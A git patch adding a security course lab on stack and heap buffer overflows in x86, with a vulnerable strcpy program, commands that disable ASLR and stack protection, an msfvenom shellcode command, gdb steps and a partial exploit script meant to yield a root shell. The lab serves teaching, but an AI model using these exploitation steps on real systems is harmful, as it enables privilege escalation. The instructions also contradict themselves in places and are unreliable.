From 71944c0c05a2ca667297b934e6892992cf517bdd Mon Sep 17 00:00:00 2001 From: Shen Ao <77866826+Neilshen123@users.noreply.github.com> Date: Thu, 6 Apr 2023 20:38:25 -0400 Subject: [PATCH] Add files via upload --- Proj-heapoverflow/06-bufferoverflow.md | 331 +++++++++++++++++++++++++ 1 file changed, 331 insertions(+) create mode 100644 Proj-heapoverflow/06-bufferoverflow.md diff --git a/Proj-heapoverflow/06-bufferoverflow.md b/Proj-heapoverflow/06-bufferoverflow.md new file mode 100644 index 0000000..82d8d68 --- /dev/null +++ b/Proj-heapoverflow/06-bufferoverflow.md @@ -0,0 +1,331 @@ +--- +title: "Introduction to Buffer Overflow Attack IN x86" +teaching: 60 +exercises: 200 +questions: +- "How is memory layout in C program?" +- "Why is it dangerous?" +- "How does bufferoverflow attack happen?" +objectives: +- "Follow instructions to successfully demonstrate the buffer overflow attack." +--- + +# Introduction to Buffer Overflow Attack IN x86 +The learning objective of this lab is for students to gain the first-hand experience on an interesting variant of buffer-overflow attack; this attack can bypass an existing protection scheme currently implemented in major Linux operating systems. A common way to exploit a buffer-overflow vulnerability is to overflow the buffer with a malicious shellcode, and then cause the vulnerable program to jump to the shellcode that is stored in the stack. To prevent these types of attacks, some operating systems allow programs to make their stacks non-executable; therefore, jumping to the shellcode will cause the program to fail. + + + +In this lab, students are given two program with buffer-overflow vulnerability; their task is to develop stack or heap overflow attack to exploit the vulnerability and finally to gain the root privilege. In addition to the attacks, students will be guided to walk through some protection schemes that have been implemented in Ubuntu to counter against the buffer-overflow attacks. This lab covers the following topics: +* Buffer overflow vulnerability and attack +* Stack and heap layout in a c program and the registers related +* Address randomization +* Assembly language +* GDB +* The generation of Shell Code + + +**Readings and related topics.** Detailed coverage of the buffer overflow attack can be found in Chapter 4 of the SEED book, *Computer Security: A Hands-on Approach*, by Wenliang Du. + + + +## Demonstration of Stack Overflow +How it works: The vulnerable point of this Lab is strcpy function which is a C function. We can refer the program.c given The strcpy() function is used to copy a string from one location to another. However, it is considered to be a potentially unsafe function because it does not perform +any bounds checking on the destination buffer, which can lead to buffer overflow vulnerabilities. Other vulnerable functions include strncpy(); memset(); etc. Suppose now the destination buffer is 20 bytes, but we paste 30 bytes in it. As we know from the introduction of stack above. It will overwritten some blocks of stack such as framed pointer or even return address. And in this case, we don’t have the return address anymore. So it will not return to the safe place but execute the attack code(shell code) that we made. Then the attack goes to succeed. So,again. Core goal: change the value of the Return Address. The basic direction of stack overflow vulnerabilities is: the parent function (caller) takes the return address of the sub-function (callee) when calling the sub-function. This address +contains the base address of the parent function. That is, after a function call is completed, the +stack frame at that time must be deleted and the value of the Return Address is returned to rip/eip +to achieve the operation of returning to the parent function. Therefore, we only need to find a way to change the value of the Return Address to the address of the vulnerable function, and we can gain control of the system through this vulnerable function. + +### The Vulnerable Program +```C +/* program.c */ + +/* This program has a stack overflow vulnerability. */ +/* Our task is to exploit this vulnerability */ +#include +#include + +void vulnerable(char *arg) +{ + char buf[512]; + strcpy(buf, arg); + +} + +void call_vul(char *arg) +{ + char temp[72]; + vulnerable(arg); +} + +int main(int argc, char **argv) +{ + if (argc != 2) { + fprintf(stderr, "Error: need a command-line argument\n"); + return 1; + } + call_vul(argv[1]); + return 0; +} + +``` +### Turning off Countermeasures (which has been done when we create the containers) +Ubuntu and other Linux distributions have implemented several security mechanisms to make the buffer-overflow attack difficult. To simplify our attacks, we need to disable them first. + +**Address Space Randomization.** Ubuntu and several other Linux-based systems uses address space randomization [?] to randomize the starting address of heap and stack. It's a type of linux kernel protection mechenism which includes ASLR & PIE. In this lab, we will disable ASLR. This makes guessing the exact addresses difficult; guessing addresses is one of the critical steps of buffer-overflow attacks. In this lab, we disable this feature using the following command: + +> ## Using setarch +> +> Because we are using containers, you will not be able to change kernel settings. This command will run in the host machine rather than container level. +{: .callout} + +```bash +sudo echo 0 | sudo tee /proc/sys/kernel/randomize_va_space +``` + +**The StackGuard Protection Scheme.** The GCC compiler implements a security mechanism called StackGuard to prevent buffer overflows. In the presence of this protection, buffer overflow attacks will not work. We can disable this protection during the compilation using the -fno-stack-protector option. For example, to compile a program example.c with StackGuard disabled, we can do the following: + +```bash +$ gcc -fno-stack-protector example.c +``` + +Non-Executable Stack. Ubuntu used to allow executable stacks, but this has now changed: the binary images of programs (and shared libraries) must declare whether they require executable stacks or not, i.e., they need to mark a field in the program header. Kernel or dynamic linker uses this marking to decide whether to make the stack of this running program executable or non-executable. This marking is done automatically by the recent versions of gcc, and by default, stacks are set to be non-executable. To change that, use the following option when compiling programs: + +```bash +For executable stack: +$ gcc -z execstack -o test test.c + +For non-executable stack: +$ gcc -z noexecstack -o test test.c +``` + +Because the objective of this lab is to show that the non-executable stack protection does not work, you should always compile your program using the "-z noexecstack" option in this lab. +### Generation of Shell Code (which has been done when we create the containers) +```bash +RUN msfvenom -p linux/x86/exec CMD=/bin/sh AppendExit=true -e x86/alpha_mixed -f python >shell.txt +``` + + + + +### Task 1: Finding out the addresses of initial position of Shell code and return address +In Stack Overflow attacks, we need to jump to some existing code that has already been loaded into the memory. We need to know what is the return address as well as the initial position of Shell Code so that we can make the function return to the position of Shell Code. \There are many ways to do that, but using the GNU gdb debugger is probably the easiest method. Let us pick an arbitrary program "program" to debug: + +```bash +$ gdb program + (gdb) b 8 (1) + (gdb) run AAAAAAAA (2) + (gdb) info register (3) + (gdb) x/200x $esp (4) +``` +We can see the initial position of the buffer. We get the return address stored right after the value of register ebp which should be ebp + 4 + +```bash + (gdb) q (1) + (gdb) y (2) +``` + +In the above gdb commands, we first set a break point at the 8th row of the program (Line 1); we then run the debugged program using command run AAAAAAAA (Line 2). +And we need to replace the value in the return address as the initial position of shell code and in order to do that. We need to fill the space from ebp to esp before the return address. If you want to know more about register. You can refer to the resources above. + +### Task 2: Putting the shell string in the memory +Our attack strategy is to jump to the system() function and get it to execute an arbitrary command. Since we would like to get a shell prompt, we want the system() function to execute the "/bin/sh" program. Therefore, the command string "/bin/sh" must be put in the memory first and we have to know its address (this address needs to be passed to the system() function). There are many ways to achieve these goals; we choose a method that use environment variables. Students are encouraged to use other approaches. + +When we execute a program from a shell prompt, the shell actually spawns a child process to execute the program. All the exported shell variables will become the environment variable of the child process. This creates an easy way for us to put some arbitrary string in the child process’s memory. Let us define a new shell variable MYSHELL, and let it contain the string "/bin/sh". From the following commands, we can verify that the string gets into the child process, and it is printed out by the env command running inside the child process. + +```bash +$ $vim shel1.py +``` +For buf, just copy from shell.txt. For initoffset, just calculate the number of ‘A’ that +should be filled in which equals to 512 + 4(size of ebp) - size of shellcode(should be 162 or 161). And replace the rerturn address that should be reversly return and written in hex format. For +example, if the return address is 0xff91dd83, then ret = ‘\x83\xdd\x91\xff + +```Python +initoffset='\x90'*1 +buf='' +ret='\x80\x8f\xff\xbf' +shell=initoffset+buf+ret + +``` + + + +### Task 3: Exploiting the Stack-Overflow Vulnerability +We are ready to create the content of badfile. Since the content involves some binary data (e.g., the address of the libc functions), we wrote a C program to do the construction. We provide you with as keleton of the code, with the essential parts left for you to fill out. + +```bash +$python shel1.py +$./program $(python sol1.py) +you will have the shell! +# <---- You’ve got a root shell! +``` + + +--- +title: "Introduction to Heap Overflow Attack IN x86" +teaching: 60 +exercises: 200 +questions: +- "How is memory layout in C program?" +- "Why is it dangerous?" +- "How does bufferoverflow attack happen?" +objectives: +- "Follow instructions to successfully demonstrate the buffer overflow attack." +--- + +# Introduction to Heap Overflow Attack IN x86 +The learning objective of this lab is for students to gain the first-hand experience on an interesting variant of buffer-overflow attack; this attack can bypass an existing protection scheme currently implemented in major Linux operating systems. A common way to exploit a heap-overflow vulnerability is to overflow the heap with garbage values, and then overwrite the return address to jump to the target function that is not called in the program. To prevent these types of attacks, some operating systems have protection in heaps and stacks and ; therefore, jumping to the function will cause the program to fail. + + + +In this lab, students are given three programs. understand_heap.c to understand the memory layout, heapoverflow_vulnerability.c for understanding the vulnerability and attack.c for attacking the vulnerablity. In addition to the attacks, students will be guided to walk through some protection schemes that have been implemented in Ubuntu to counter against the buffer-overflow attacks. This lab covers the following topics: +* Heap overflow vulnerability and attack +* Stack and heap layout in a c program and the registers related +* Address randomization +* Assembly language +* GDB +* The generation of Shell Code + + +**Readings and related topics.** Detailed coverage of the buffer overflow attack can be found in Chapter 4 of the SEED book, *Computer Security: A Hands-on Approach*, by Wenliang Du. + + +## Understanding Memory Layout +Each running program has its own memory layout, separated from other programs. To understand it more better let us take the example of our understanding_heap.c example. The layout consists of a lot of segments, including: +```C +/* understanding_heap.c */ + +/* This program is to understand memory layout. */ +#include + +void dummy_func() +{ + printf("This is a dummy function."); +} + +void memory_check() +{ + printf("This is a sample memory check"); +} + + +int main(void) +{ + char *address; + int main_add=memory_check; + printf("Enter the address of function memory_check in hex :"); + scanf("%s", address); + char *b = address + 2; + int num = (int)strtol(b, NULL, 16); + if(main_add==num){ + printf("\n You have found the address successfully!!!\n\n"); + } + printf("Next Step is to attack the heapoverflow_vulnerability"); + return 0; +} +``` +In this example let us consider the memory layout for function default_fc(argv*) +* Stack: Stores local variables of a function. + + Stores the variable ``` temp[72] ``` + ebp[Base pointer address] + Return address + arguments[char *arg] +* Heap: Stores dynamically allocated variables. (Variables stored using malloc() or calloc() are stored in heap) + + Stores the variable ```ptr``` + ebp[Base pointer address] + Return address. +* Data: Stores global variables of the function. (Consist of both unitialized data + initialized data) + + + Stores the variable ``` data ``` : 10 Bytes. + +![memory_layout.png](data:image/png;base64,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